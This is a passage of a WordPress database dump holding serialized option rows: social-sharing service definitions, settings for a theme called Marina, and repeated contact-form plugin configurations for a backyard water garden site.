Bookmarks\";s:17:\"spriteCoordinates\";a:4:{i:16;a:2:{i:0;s:5:\"-96px\";i:1;s:3:\"0px\";}i:32;a:2:{i:0;s:6:\"-192px\";i:1;s:3:\"0px\";}i:48;a:2:{i:0;s:6:\"-288px\";i:1;s:3:\"0px\";}i:64;a:2:{i:0;s:6:\"-384px\";i:1;s:3:\"0px\";}}}s:10:\"HackerNews\";a:3:{s:7:\"favicon\";s:15:\"hacker_news.png\";s:3:\"url\";s:62:\"http://news.ycombinator.com/submitlink?u=PERMALINK&t=TITLE\";s:17:\"spriteCoordinates\";a:4:{i:16;a:2:{i:0;s:6:\"-128px\";i:1;s:3:\"0px\";}i:32;a:2:{i:0;s:6:\"-256px\";i:1;s:3:\"0px\";}i:48;a:2:{i:0;s:6:\"-384px\";i:1;s:3:\"0px\";}i:64;a:2:{i:0;s:6:\"-512px\";i:1;s:3:\"0px\";}}}s:11:\"MSNReporter\";a:4:{s:7:\"favicon\";s:7:\"msn.png\";s:3:\"url\";s:121:\"http://reporter.es.msn.com/?fn=contribute&Title=TITLE&URL=PERMALINK&cat_id=6&tag_id=31&Remark=EXCERPT\";s:11:\"description\";s:12:\"MSN Reporter\";s:17:\"spriteCoordinates\";a:4:{i:16;a:2:{i:0;s:6:\"-176px\";i:1;s:3:\"0px\";}i:32;a:2:{i:0;s:6:\"-352px\";i:1;s:3:\"0px\";}i:48;a:2:{i:0;s:6:\"-528px\";i:1;s:3:\"0px\";}i:64;a:2:{i:0;s:6:\"-704px\";i:1;s:3:\"0px\";}}}s:9:\"BlinkList\";a:4:{s:7:\"favicon\";s:13:\"blinklist.png\";s:3:\"url\";s:94:\"http://www.blinklist.com/index.php?Action=Blink/addblink.php&Url=PERMALINK&Title=TITLE\";s:17:\"spriteCoordinates\";a:4:{i:16;a:2:{i:0;s:3:\"0px\";i:1;s:3:\"0px\";}i:32;a:2:{i:0;s:3:\"0px\";i:1;s:3:\"0px\";}i:48;a:2:{i:0;s:3:\"0px\";i:1;s:3:\"0px\";}i:64;a:2:{i:0;s:3:\"0px\";i:1;s:3:\"0px\";}}s:14:\"supportsIframe\";b:0;}s:6:\"Sphinn\";a:3:{s:7:\"favicon\";s:10:\"sphinn.png\";s:3:\"url\";s:66:\"http://sphinn.com/index.php?c=post&m=submit&link=PERMALINK\";s:17:\"spriteCoordinates\";a:4:{i:16;a:2:{i:0;s:5:\"-96px\";i:1;s:5:\"-16px\";}i:32;a:2:{i:0;s:6:\"-192px\";i:1;s:5:\"-32px\";}i:48;a:2:{i:0;s:6:\"-288px\";i:1;s:5:\"-48px\";}i:64;a:2:{i:0;s:6:\"-384px\";i:1;s:5:\"-64px\";}}}s:9:\"Posterous\";a:3:{s:7:\"favicon\";s:13:\"posterous.png\";s:3:\"url\";s:81:\"http://posterous.com/share?linkto=PERMALINK&title=TITLE&selection=EXCERPT\";s:17:\"spriteCoordinates\";a:4:{i:16;a:2:{i:0;s:5:\"-32px\";i:1;s:5:\"-16px\";}i:32;a:2:{i:0;s:5:\"-64px\";i:1;s:5:\"-32px\";}i:48;a:2:{i:0;s:5:\"-96px\";i:1;s:5:\"-48px\";}i:64;a:2:{i:0;s:6:\"-128px\";i:1;s:5:\"-64px\";}}}s:6:\"Tumblr\";a:4:{s:7:\"favicon\";s:10:\"tumblr.png\";s:3:\"url\";s:73:\"http://www.tumblr.com/share?v=3&u=PERMALINK&t=TITLE&s=EXCERPT\";s:17:\"spriteCoordinates\";a:4:{i:16;a:2:{i:0;s:6:\"-128px\";i:1;s:5:\"-16px\";}i:32;a:2:{i:0;s:6:\"-256px\";i:1;s:5:\"-32px\";}i:48;a:2:{i:0;s:6:\"-384px\";i:1;s:5:\"-48px\";}i:64;a:2:{i:0;s:6:\"-512px\";i:1;s:5:\"-64px\";}}s:14:\"supportsIframe\";b:0;}s:5:\"email\";a:4:{s:7:\"favicon\";s:9:\"gmail.png\";s:3:\"url\";s:86:\"https://mail.google.com/mail/?view=cm&fs=1&to&su=TITLE&body=PERMALINK&ui=2&tf=1&shva=1\";s:17:\"spriteCoordinates\";a:4:{i:16;a:2:{i:0;s:5:\"-80px\";i:1;s:3:\"0px\";}i:32;a:2:{i:0;s:6:\"-160px\";i:1;s:3:\"0px\";}i:48;a:2:{i:0;s:6:\"-240px\";i:1;s:3:\"0px\";}i:64;a:2:{i:0;s:6:\"-320px\";i:1;s:3:\"0px\";}}s:14:\"supportsIframe\";b:0;}s:13:\"Google Reader\";a:3:{s:7:\"favicon\";s:14:\"googlebuzz.png\";s:3:\"url\";s:106:\"http://www.google.com/reader/link?url=PERMALINK&title=TITLE&srcURL=PERMALINK&srcTitle=BLOGNAME\";s:17:\"spriteCoordinates\";a:4:{i:16;a:2:{i:0;s:6:\"-112px\";i:1;s:3:\"0px\";}i:32;a:2:{i:0;s:6:\"-224px\";i:1;s:3:\"0px\";}i:48;a:2:{i:0;s:6:\"-336px\";i:1;s:3:\"0px\";}i:64;a:2:{i:0;s:6:\"-448px\";i:1;s:3:\"0px\";}}}s:16:\"Add to favorites\";a:3:{s:7:\"favicon\";s:13:\"favorites.png\";s:3:\"url\";s:28:\"javascript:AddToFavorites();\";s:17:\"spriteCoordinates\";a:4:{i:16;a:2:{i:0;s:5:\"-64px\";i:1;s:3:\"0px\";}i:32;a:2:{i:0;s:6:\"-128px\";i:1;s:3:\"0px\";}i:48;a:2:{i:0;s:6:\"-192px\";i:1;s:3:\"0px\";}i:64;a:2:{i:0;s:6:\"-256px\";i:1;s:3:\"0px\";}}}s:4:\"More\";a:3:{s:7:\"favicon\";s:8:\"more.png\";s:3:\"url\";s:18:\"javascript:more();\";s:17:\"spriteCoordinates\";a:4:{i:16;a:2:{i:0;s:3:\"0px\";i:1;s:3:\"0px\";}i:32;a:2:{i:0;s:3:\"0px\";i:1;s:3:\"0px\";}i:48;a:2:{i:0;s:3:\"0px\";i:1;s:3:\"0px\";}i:64;a:2:{i:0;s:3:\"0px\";i:1;s:3:\"0px\";}}}}','yes'),(500,'marina_cufon','Yes','yes'),(501,'marina_gldcat','slider','yes'),(502,'marina_gldct','3','yes'),(503,'marina_twit','twitter','yes'),(504,'marina_banner1','http://wpclass.thegammonpress.com/ed2goclass/wp-content/uploads/2013/06/125x125-pond_pkgs.png','yes'),(352,'recently_activated','a:0:{}','yes'),(353,'si_contact_form_version','3.1.8.2','yes'),(605,'category_children','a:1:{i:2;a:1:{i:0;i:3;}}','yes'),(710,'_site_transient_timeout_browser_f76e1da45697f2bea834d3cc529b10fb','1423772302','yes'),(244,'nav_menu_options','a:2:{i:0;b:0;s:8:\"auto_add\";a:1:{i:0;i:4;}}','yes'),(356,'si_contact_form2','a:193:{s:9:\"form_name\";s:0:\"\";s:7:\"welcome\";s:41:\"<p>Comments or questions are welcome.</p>\";s:8:\"email_to\";s:30:\"Webmaster,Gammon_Press@msn.com\";s:17:\"php_mailer_enable\";s:9:\"wordpress\";s:10:\"email_from\";s:0:\"\";s:19:\"email_from_enforced\";s:5:\"false\";s:14:\"email_reply_to\";s:0:\"\";s:9:\"email_bcc\";s:0:\"\";s:13:\"email_subject\";s:38:\"Build a Backyard Water Garden Contact:\";s:18:\"email_subject_list\";s:0:\"\";s:11:\"name_format\";s:4:\"name\";s:9:\"name_type\";s:8:\"required\";s:10:\"email_type\";s:8:\"required\";s:12:\"subject_type\";s:8:\"required\";s:12:\"message_type\";s:8:\"required\";s:21:\"preserve_space_enable\";s:5:\"false\";s:10:\"max_fields\";s:1:\"4\";s:12:\"double_email\";s:5:\"false\";s:16:\"name_case_enable\";s:5:\"false\";s:18:\"sender_info_enable\";s:4:\"true\";s:14:\"domain_protect\";s:4:\"true\";s:15:\"email_check_dns\";s:5:\"false\";s:10:\"email_html\";s:5:\"false\";s:15:\"akismet_disable\";s:5:\"false\";s:19:\"akismet_send_anyway\";s:4:\"true\";s:14:\"captcha_enable\";s:4:\"true\";s:13:\"captcha_small\";s:5:\"false\";s:18:\"captcha_difficulty\";s:6:\"medium\";s:16:\"captcha_no_trans\";s:5:\"false\";s:12:\"enable_audio\";s:4:\"true\";s:18:\"enable_audio_flash\";s:5:\"false\";s:12:\"captcha_perm\";s:5:\"false\";s:18:\"captcha_perm_level\";s:4:\"read\";s:15:\"honeypot_enable\";s:5:\"false\";s:15:\"redirect_enable\";s:4:\"true\";s:16:\"redirect_seconds\";s:1:\"3\";s:12:\"redirect_url\";s:44:\"http://wpclass.thegammonpress.com/ed2goclass\";s:14:\"redirect_query\";s:5:\"false\";s:15:\"redirect_ignore\";s:0:\"\";s:15:\"redirect_rename\";s:0:\"\";s:12:\"redirect_add\";s:0:\"\";s:18:\"redirect_email_off\";s:5:\"false\";s:11:\"silent_send\";s:3:\"off\";s:10:\"silent_url\";s:0:\"\";s:13:\"silent_ignore\";s:0:\"\";s:13:\"silent_rename\";s:0:\"\";s:10:\"silent_add\";s:0:\"\";s:16:\"silent_email_off\";s:5:\"false\";s:13:\"export_enable\";s:4:\"true\";s:13:\"export_ignore\";s:0:\"\";s:13:\"export_rename\";s:0:\"\";s:10:\"export_add\";s:0:\"\";s:16:\"export_email_off\";s:5:\"false\";s:19:\"ex_fields_after_msg\";s:5:\"false\";s:11:\"date_format\";s:10:\"mm/dd/yyyy\";s:13:\"cal_start_day\";s:1:\"0\";s:11:\"time_format\";s:2:\"12\";s:12:\"attach_types\";s:28:\"doc,pdf,txt,gif,jpg,jpeg,png\";s:11:\"attach_size\";s:3:\"1mb\";s:19:\"textarea_html_allow\";s:5:\"false\";s:17:\"enable_areyousure\";s:5:\"false\";s:19:\"auto_respond_enable\";s:5:\"false\";s:17:\"auto_respond_html\";s:5:\"false\";s:22:\"auto_respond_from_name\";s:9:\"WordPress\";s:23:\"auto_respond_from_email\";s:20:\"Gammon_Press@msn.com\";s:21:\"auto_respond_reply_to\";s:20:\"Gammon_Press@msn.com\";s:20:\"auto_respond_subject\";s:0:\"\";s:20:\"auto_respond_message\";s:0:\"\";s:26:\"req_field_indicator_enable\";s:4:\"true\";s:22:\"req_field_label_enable\";s:4:\"true\";s:19:\"req_field_indicator\";s:2:\" *\";s:13:\"border_enable\";s:5:\"false\";s:10:\"form_style\";s:12:\"width:375px;\";s:12:\"border_style\";s:37:\"border:1px solid black; padding:10px;\";s:14:\"required_style\";s:16:\"text-align:left;\";s:11:\"notes_style\";s:16:\"text-align:left;\";s:11:\"title_style\";s:33:\"text-align:left; padding-top:5px;\";s:11:\"field_style\";s:26:\"text-align:left; margin:0;\";s:15:\"field_div_style\";s:16:\"text-align:left;\";s:11:\"error_style\";s:27:\"text-align:left; color:red;\";s:12:\"select_style\";s:16:\"text-align:left;\";s:20:\"captcha_div_style_sm\";s:42:\"width:175px; height:50px; padding-top:2px;\";s:19:\"captcha_div_style_m\";s:42:\"width:250px; height:65px; padding-top:2px;\";s:19:\"captcha_input_style\";s:38:\"text-align:left; margin:0; width:50px;\";s:16:\"submit_div_style\";s:33:\"text-align:left; padding-top:2px;\";s:12:\"button_style\";s:25:\"cursor:pointer; margin:0;\";s:11:\"reset_style\";s:25:\"cursor:pointer; margin:0;\";s:16:\"powered_by_style\";s:55:\"font-size:x-small; font-weight:normal; padding-top:5px;\";s:14:\"redirect_style\";s:16:\"text-align:left;\";s:10:\"field_size\";s:2:\"40\";s:18:\"captcha_field_size\";s:1:\"6\";s:9:\"text_cols\";s:2:\"30\";s:9:\"text_rows\";s:2:\"10\";s:13:\"aria_required\";s:5:\"false\";s:16:\"auto_fill_enable\";s:4:\"true\";s:12:\"title_border\";s:13:\"Contact Form:\";s:10:\"title_dept\";s:0:\"\";s:12:\"title_select\";s:0:\"\";s:10:\"title_name\";s:0:\"\";s:11:\"title_fname\";s:0:\"\";s:11:\"title_mname\";s:0:\"\";s:12:\"title_miname\";s:0:\"\";s:11:\"title_lname\";s:0:\"\";s:11:\"title_email\";s:0:\"\";s:12:\"title_email2\";s:0:\"\";s:17:\"title_email2_help\";s:0:\"\";s:10:\"title_subj\";s:0:\"\";s:10:\"title_mess\";s:0:\"\";s:10:\"title_capt\";s:0:\"\";s:12:\"title_submit\";s:0:\"\";s:11:\"title_reset\";s:0:\"\";s:16:\"title_areyousure\";s:0:\"\";s:17:\"text_message_sent\";s:0:\"\";s:16:\"tooltip_required\";s:0:\"\";s:15:\"tooltip_captcha\";s:0:\"\";s:13:\"tooltip_audio\";s:0:\"\";s:15:\"tooltip_refresh\";s:0:\"\";s:17:\"tooltip_filetypes\";s:0:\"\";s:16:\"tooltip_filesize\";s:0:\"\";s:12:\"enable_reset\";s:5:\"false\";s:18:\"enable_credit_link\";s:5:\"false\";s:20:\"error_contact_select\";s:0:\"\";s:10:\"error_name\";s:0:\"\";s:11:\"error_email\";s:0:\"\";s:12:\"error_email2\";s:0:\"\";s:11:\"error_field\";s:0:\"\";s:13:\"error_subject\";s:0:\"\";s:13:\"error_message\";s:0:\"\";s:11:\"error_input\";s:0:\"\";s:19:\"error_captcha_blank\";s:0:\"\";s:19:\"error_captcha_wrong\";s:0:\"\";s:13:\"error_correct\";s:0:\"\";s:13:\"error_spambot\";s:0:\"\";s:13:\"vcita_enabled\";s:5:\"false\";s:14:\"vcita_approved\";s:5:\"false\";s:9:\"vcita_uid\";s:0:\"\";s:11:\"vcita_email\";s:0:\"\";s:20:\"vcita_confirm_tokens\";s:0:\"\";s:17:\"vcita_initialized\";s:5:\"false\";s:16:\"vcita_first_name\";s:0:\"\";s:15:\"vcita_last_name\";s:0:\"\";s:17:\"ex_field1_default\";s:1:\"0\";s:22:\"ex_field1_default_text\";s:0:\"\";s:13:\"ex_field1_req\";s:5:\"false\";s:15:\"ex_field1_label\";s:0:\"\";s:14:\"ex_field1_type\";s:4:\"text\";s:17:\"ex_field1_max_len\";s:0:\"\";s:19:\"ex_field1_label_css\";s:0:\"\";s:19:\"ex_field1_input_css\";s:0:\"\";s:20:\"ex_field1_attributes\";s:0:\"\";s:15:\"ex_field1_regex\";s:0:\"\";s:21:\"ex_field1_regex_error\";s:0:\"\";s:15:\"ex_field1_notes\";s:0:\"\";s:21:\"ex_field1_notes_after\";s:0:\"\";s:17:\"ex_field2_default\";s:1:\"0\";s:22:\"ex_field2_default_text\";s:0:\"\";s:13:\"ex_field2_req\";s:5:\"false\";s:15:\"ex_field2_label\";s:0:\"\";s:14:\"ex_field2_type\";s:4:\"text\";s:17:\"ex_field2_max_len\";s:0:\"\";s:19:\"ex_field2_label_css\";s:0:\"\";s:19:\"ex_field2_input_css\";s:0:\"\";s:20:\"ex_field2_attributes\";s:0:\"\";s:15:\"ex_field2_regex\";s:0:\"\";s:21:\"ex_field2_regex_error\";s:0:\"\";s:15:\"ex_field2_notes\";s:0:\"\";s:21:\"ex_field2_notes_after\";s:0:\"\";s:17:\"ex_field3_default\";s:1:\"0\";s:22:\"ex_field3_default_text\";s:0:\"\";s:13:\"ex_field3_req\";s:5:\"false\";s:15:\"ex_field3_label\";s:0:\"\";s:14:\"ex_field3_type\";s:4:\"text\";s:17:\"ex_field3_max_len\";s:0:\"\";s:19:\"ex_field3_label_css\";s:0:\"\";s:19:\"ex_field3_input_css\";s:0:\"\";s:20:\"ex_field3_attributes\";s:0:\"\";s:15:\"ex_field3_regex\";s:0:\"\";s:21:\"ex_field3_regex_error\";s:0:\"\";s:15:\"ex_field3_notes\";s:0:\"\";s:21:\"ex_field3_notes_after\";s:0:\"\";s:17:\"ex_field4_default\";s:1:\"0\";s:22:\"ex_field4_default_text\";s:0:\"\";s:13:\"ex_field4_req\";s:5:\"false\";s:15:\"ex_field4_label\";s:0:\"\";s:14:\"ex_field4_type\";s:4:\"text\";s:17:\"ex_field4_max_len\";s:0:\"\";s:19:\"ex_field4_label_css\";s:0:\"\";s:19:\"ex_field4_input_css\";s:0:\"\";s:20:\"ex_field4_attributes\";s:0:\"\";s:15:\"ex_field4_regex\";s:0:\"\";s:21:\"ex_field4_regex_error\";s:0:\"\";s:15:\"ex_field4_notes\";s:0:\"\";s:21:\"ex_field4_notes_after\";s:0:\"\";}','yes'),(357,'si_contact_form3','a:193:{s:9:\"form_name\";s:0:\"\";s:7:\"welcome\";s:41:\"<p>Comments or questions are welcome.</p>\";s:8:\"email_to\";s:30:\"Webmaster,Gammon_Press@msn.com\";s:17:\"php_mailer_enable\";s:9:\"wordpress\";s:10:\"email_from\";s:0:\"\";s:19:\"email_from_enforced\";s:5:\"false\";s:14:\"email_reply_to\";s:0:\"\";s:9:\"email_bcc\";s:0:\"\";s:13:\"email_subject\";s:38:\"Build a Backyard Water Garden Contact:\";s:18:\"email_subject_list\";s:0:\"\";s:11:\"name_format\";s:4:\"name\";s:9:\"name_type\";s:8:\"required\";s:10:\"email_type\";s:8:\"required\";s:12:\"subject_type\";s:8:\"required\";s:12:\"message_type\";s:8:\"required\";s:21:\"preserve_space_enable\";s:5:\"false\";s:10:\"max_fields\";s:1:\"4\";s:12:\"double_email\";s:5:\"false\";s:16:\"name_case_enable\";s:5:\"false\";s:18:\"sender_info_enable\";s:4:\"true\";s:14:\"domain_protect\";s:4:\"true\";s:15:\"email_check_dns\";s:5:\"false\";s:10:\"email_html\";s:5:\"false\";s:15:\"akismet_disable\";s:5:\"false\";s:19:\"akismet_send_anyway\";s:4:\"true\";s:14:\"captcha_enable\";s:4:\"true\";s:13:\"captcha_small\";s:5:\"false\";s:18:\"captcha_difficulty\";s:6:\"medium\";s:16:\"captcha_no_trans\";s:5:\"false\";s:12:\"enable_audio\";s:4:\"true\";s:18:\"enable_audio_flash\";s:5:\"false\";s:12:\"captcha_perm\";s:5:\"false\";s:18:\"captcha_perm_level\";s:4:\"read\";s:15:\"honeypot_enable\";s:5:\"false\";s:15:\"redirect_enable\";s:4:\"true\";s:16:\"redirect_seconds\";s:1:\"3\";s:12:\"redirect_url\";s:44:\"http://wpclass.thegammonpress.com/ed2goclass\";s:14:\"redirect_query\";s:5:\"false\";s:15:\"redirect_ignore\";s:0:\"\";s:15:\"redirect_rename\";s:0:\"\";s:12:\"redirect_add\";s:0:\"\";s:18:\"redirect_email_off\";s:5:\"false\";s:11:\"silent_send\";s:3:\"off\";s:10:\"silent_url\";s:0:\"\";s:13:\"silent_ignore\";s:0:\"\";s:13:\"silent_rename\";s:0:\"\";s:10:\"silent_add\";s:0:\"\";s:16:\"silent_email_off\";s:5:\"false\";s:13:\"export_enable\";s:4:\"true\";s:13:\"export_ignore\";s:0:\"\";s:13:\"export_rename\";s:0:\"\";s:10:\"export_add\";s:0:\"\";s:16:\"export_email_off\";s:5:\"false\";s:19:\"ex_fields_after_msg\";s:5:\"false\";s:11:\"date_format\";s:10:\"mm/dd/yyyy\";s:13:\"cal_start_day\";s:1:\"0\";s:11:\"time_format\";s:2:\"12\";s:12:\"attach_types\";s:28:\"doc,pdf,txt,gif,jpg,jpeg,png\";s:11:\"attach_size\";s:3:\"1mb\";s:19:\"textarea_html_allow\";s:5:\"false\";s:17:\"enable_areyousure\";s:5:\"false\";s:19:\"auto_respond_enable\";s:5:\"false\";s:17:\"auto_respond_html\";s:5:\"false\";s:22:\"auto_respond_from_name\";s:9:\"WordPress\";s:23:\"auto_respond_from_email\";s:20:\"Gammon_Press@msn.com\";s:21:\"auto_respond_reply_to\";s:20:\"Gammon_Press@msn.com\";s:20:\"auto_respond_subject\";s:0:\"\";s:20:\"auto_respond_message\";s:0:\"\";s:26:\"req_field_indicator_enable\";s:4:\"true\";s:22:\"req_field_label_enable\";s:4:\"true\";s:19:\"req_field_indicator\";s:2:\" *\";s:13:\"border_enable\";s:5:\"false\";s:10:\"form_style\";s:12:\"width:375px;\";s:12:\"border_style\";s:37:\"border:1px solid black; padding:10px;\";s:14:\"required_style\";s:16:\"text-align:left;\";s:11:\"notes_style\";s:16:\"text-align:left;\";s:11:\"title_style\";s:33:\"text-align:left; padding-top:5px;\";s:11:\"field_style\";s:26:\"text-align:left; margin:0;\";s:15:\"field_div_style\";s:16:\"text-align:left;\";s:11:\"error_style\";s:27:\"text-align:left; color:red;\";s:12:\"select_style\";s:16:\"text-align:left;\";s:20:\"captcha_div_style_sm\";s:42:\"width:175px; height:50px; padding-top:2px;\";s:19:\"captcha_div_style_m\";s:42:\"width:250px; height:65px; padding-top:2px;\";s:19:\"captcha_input_style\";s:38:\"text-align:left; margin:0; width:50px;\";s:16:\"submit_div_style\";s:33:\"text-align:left; padding-top:2px;\";s:12:\"button_style\";s:25:\"cursor:pointer; margin:0;\";s:11:\"reset_style\";s:25:\"cursor:pointer; margin:0;\";s:16:\"powered_by_style\";s:55:\"font-size:x-small; font-weight:normal; padding-top:5px;\";s:14:\"redirect_style\";s:16:\"text-align:left;\";s:10:\"field_size\";s:2:\"40\";s:18:\"captcha_field_size\";s:1:\"6\";s:9:\"text_cols\";s:2:\"30\";s:9:\"text_rows\";s:2:\"10\";s:13:\"aria_required\";s:5:\"false\";s:16:\"auto_fill_enable\";s:4:\"true\";s:12:\"title_border\";s:13:\"Contact Form:\";s:10:\"title_dept\";s:0:\"\";s:12:\"title_select\";s:0:\"\";s:10:\"title_name\";s:0:\"\";s:11:\"title_fname\";s:0:\"\";s:11:\"title_mname\";s:0:\"\";s:12:\"title_miname\";s:0:\"\";s:11:\"title_lname\";s:0:\"\";s:11:\"title_email\";s:0:\"\";s:12:\"title_email2\";s:0:\"\";s:17:\"title_email2_help\";s:0:\"\";s:10:\"title_subj\";s:0:\"\";s:10:\"title_mess\";s:0:\"\";s:10:\"title_capt\";s:0:\"\";s:12:\"title_submit\";s:0:\"\";s:11:\"title_reset\";s:0:\"\";s:16:\"title_areyousure\";s:0:\"\";s:17:\"text_message_sent\";s:0:\"\";s:16:\"tooltip_required\";s:0:\"\";s:15:\"tooltip_captcha\";s:0:\"\";s:13:\"tooltip_audio\";s:0:\"\";s:15:\"tooltip_refresh\";s:0:\"\";s:17:\"tooltip_filetypes\";s:0:\"\";s:16:\"tooltip_filesize\";s:0:\"\";s:12:\"enable_reset\";s:5:\"false\";s:18:\"enable_credit_link\";s:5:\"false\";s:20:\"error_contact_select\";s:0:\"\";s:10:\"error_name\";s:0:\"\";s:11:\"error_email\";s:0:\"\";s:12:\"error_email2\";s:0:\"\";s:11:\"error_field\";s:0:\"\";s:13:\"error_subject\";s:0:\"\";s:13:\"error_message\";s:0:\"\";s:11:\"error_input\";s:0:\"\";s:19:\"error_captcha_blank\";s:0:\"\";s:19:\"error_captcha_wrong\";s:0:\"\";s:13:\"error_correct\";s:0:\"\";s:13:\"error_spambot\";s:0:\"\";s:13:\"vcita_enabled\";s:5:\"false\";s:14:\"vcita_approved\";s:5:\"false\";s:9:\"vcita_uid\";s:0:\"\";s:11:\"vcita_email\";s:0:\"\";s:20:\"vcita_confirm_tokens\";s:0:\"\";s:17:\"vcita_initialized\";s:5:\"false\";s:16:\"vcita_first_name\";s:0:\"\";s:15:\"vcita_last_name\";s:0:\"\";s:17:\"ex_field1_default\";s:1:\"0\";s:22:\"ex_field1_default_text\";s:0:\"\";s:13:\"ex_field1_req\";s:5:\"false\";s:15:\"ex_field1_label\";s:0:\"\";s:14:\"ex_field1_type\";s:4:\"text\";s:17:\"ex_field1_max_len\";s:0:\"\";s:19:\"ex_field1_label_css\";s:0:\"\";s:19:\"ex_field1_input_css\";s:0:\"\";s:20:\"ex_field1_attributes\";s:0:\"\";s:15:\"ex_field1_regex\";s:0:\"\";s:21:\"ex_field1_regex_error\";s:0:\"\";s:15:\"ex_field1_notes\";s:0:\"\";s:21:\"ex_field1_notes_after\";s:0:\"\";s:17:\"ex_field2_default\";s:1:\"0\";s:22:\"ex_field2_default_text\";s:0:\"\";s:13:\"ex_field2_req\";s:5:\"false\";s:15:\"ex_field2_label\";s:0:\"\";s:14:\"ex_field2_type\";s:4:\"text\";s:17:\"ex_field2_max_len\";s:0:\"\";s:19:\"ex_field2_label_css\";s:0:\"\";s:19:\"ex_field2_input_css\";s:0:\"\";s:20:\"ex_field2_attributes\";s:0:\"\";s:15:\"ex_field2_regex\";s:0:\"\";s:21:\"ex_field2_regex_error\";s:0:\"\";s:15:\"ex_field2_notes\";s:0:\"\";s:21:\"ex_field2_notes_after\";s:0:\"\";s:17:\"ex_field3_default\";s:1:\"0\";s:22:\"ex_field3_default_text\";s:0:\"\";s:13:\"ex_field3_req\";s:5:\"false\";s:15:\"ex_field3_label\";s:0:\"\";s:14:\"ex_field3_type\";s:4:\"text\";s:17:\"ex_field3_max_len\";s:0:\"\";s:19:\"ex_field3_label_css\";s:0:\"\";s:19:\"ex_field3_input_css\";s:0:\"\";s:20:\"ex_field3_attributes\";s:0:\"\";s:15:\"ex_field3_regex\";s:0:\"\";s:21:\"ex_field3_regex_error\";s:0:\"\";s:15:\"ex_field3_notes\";s:0:\"\";s:21:\"ex_field3_notes_after\";s:0:\"\";s:17:\"ex_field4_default\";s:1:\"0\";s:22:\"ex_field4_default_text\";s:0:\"\";s:13:\"ex_field4_req\";s:5:\"false\";s:15:\"ex_field4_label\";s:0:\"\";s:14:\"ex_field4_type\";s:4:\"text\";s:17:\"ex_field4_max_len\";s:0:\"\";s:19:\"ex_field4_label_css\";s:0:\"\";s:19:\"ex_field4_input_css\";s:0:\"\";s:20:\"ex_field4_attributes\";s:0:\"\";s:15:\"ex_field4_regex\";s:0:\"\";s:21:\"ex_field4_regex_error\";s:0:\"\";s:15:\"ex_field4_notes\";s:0:\"\";s:21:\"ex_field4_notes_after\";s:0:\"\";}','yes'),(199,'current_theme','Marina','yes'),(200,'theme_mods_Marina','a:2:{i:0;b:0;s:18:\"nav_menu_locations\";a:2:{s:7:\"primary\";i:0;s:9:\"secondary\";i:4;}}','yes'),(201,'theme_switched','','yes'),(358,'si_contact_form4','a:193:{s:9:\"form_name\";s:0:\"\";s:7:\"welcome\";s:41:\"<p>Comments or questions are welcome.</p>\";s:8:\"email_to\";s:30:\"Webmaster,Gammon_Press@msn.com\";s:17:\"php_mailer_enable\";s:9:\"wordpress\";s:10:\"email_from\";s:0:\"\";s:19:\"email_from_enforced\";s:5:\"false\";s:14:\"email_reply_to\";s:0:\"\";s:9:\"email_bcc\";s:0:\"\";s:13:\"email_subject\";s:38:\"Build a Backyard Water Garden Contact:\";s:18:\"email_subject_list\";s:0:\"\";s:11:\"name_format\";s:4:\"name\";s:9:\"name_type\";s:8:\"required\";s:10:\"email_type\";s:8:\"required\";s:12:\"subject_type\";s:8:\"required\";s:12:\"message_type\";s:8:\"required\";s:21:\"preserve_space_enable\";s:5:\"false\";s:10:\"max_fields\";s:1:\"4\";s:12:\"double_email\";s:5:\"false\";s:16:\"name_case_enable\";s:5:\"false\";s:18:\"sender_info_enable\";s:4:\"true\";s:14:\"domain_protect\";s:4:\"true\";s:15:\"email_check_dns\";s:5:\"false\";s:10:\"email_html\";s:5:\"false\";s:15:\"akismet_disable\";s:5:\"false\";s:19:\"akismet_send_anyway\";s:4:\"true\";s:14:\"captcha_enable\";s:4:\"true\";s:13:\"captcha_small\";s:5:\"false\";s:18:\"captcha_difficulty\";s:6:\"medium\";s:16:\"captcha_no_trans\";s:5:\"false\";s:12:\"enable_audio\";s:4:\"true\";s:18:\"enable_audio_flash\";s:5:\"false\";s:12:\"captcha_perm\";s:5:\"false\";s:18:\"captcha_perm_level\";s:4:\"read\";s:15:\"honeypot_enable\";s:5:\"false\";s:15:\"redirect_enable\";s:4:\"true\";s:16:\"redirect_seconds\";s:1:\"3\";s:12:\"redirect_url\";s:44:\"http://wpclass.thegammonpress.com/ed2goclass\";s:14:\"redirect_query\";s:5:\"false\";s:15:\"redirect_ignore\";s:0:\"\";s:15:\"redirect_rename\";s:0:\"\";s:12:\"redirect_add\";s:0:\"\";s:18:\"redirect_email_off\";s:5:\"false\";s:11:\"silent_send\";s:3:\"off\";s:10:\"silent_url\";s:0:\"\";s:13:\"silent_ignore\";s:0:\"\";s:13:\"silent_rename\";s:0:\"\";s:10:\"silent_add\";s:0:\"\";s:16:\"silent_email_off\";s:5:\"false\";s:13:\"export_enable\";s:4:\"true\";s:13:\"export_ignore\";s:0:\"\";s:13:\"export_rename\";s:0:\"\";s:10:\"export_add\";s:0:\"\";s:16:\"export_email_off\";s:5:\"false\";s:19:\"ex_fields_after_msg\";s:5:\"false\";s:11:\"date_format\";s:10:\"mm/dd/yyyy\";s:13:\"cal_start_day\";s:1:\"0\";s:11:\"time_format\";s:2:\"12\";s:12:\"attach_types\";s:28:\"doc,pdf,txt,gif,jpg,jpeg,png\";s:11:\"attach_size\";s:3:\"1mb\";s:19:\"textarea_html_allow\";s:5:\"false\";s:17:\"enable_areyousure\";s:5:\"false\";s:19:\"auto_respond_enable\";s:5:\"false\";s:17:\"auto_respond_html\";s:5:\"false\";s:22:\"auto_respond_from_name\";s:9:\"WordPress\";s:23:\"auto_respond_from_email\";s:20:\"Gammon_Press@msn.com\";s:21:\"auto_respond_reply_to\";s:20:\"Gammon_Press@msn.com\";s:20:\"auto_respond_subject\";s:0:\"\";s:20:\"auto_respond_message\";s:0:\"\";s:26:\"req_field_indicator_enable\";s:4:\"true\";s:22:\"req_field_label_enable\";s:4:\"true\";s:19:\"req_field_indicator\";s:2:\" *\";s:13:\"border_enable\";s:5:\"false\";s:10:\"form_style\";s:12:\"width:375px;\";s:12:\"border_style\";s:37:\"border:1px solid black; padding:10px;\";s:14:\"required_style\";s:16:\"text-align:left;\";s:11:\"notes_style\";s:16:\"text-align:left;\";s:11:\"title_style\";s:33:\"text-align:left; padding-top:5px;\";s:11:\"field_style\";s:26:\"text-align:left; margin:0;\";s:15:\"field_div_style\";s:16:\"text-align:left;\";s:11:\"error_style\";s:27:\"text-align:left; color:red;\";s:12:\"select_style\";s:16:\"text-align:left;\";s:20:\"captcha_div_style_sm\";s:42:\"width:175px; height:50px; 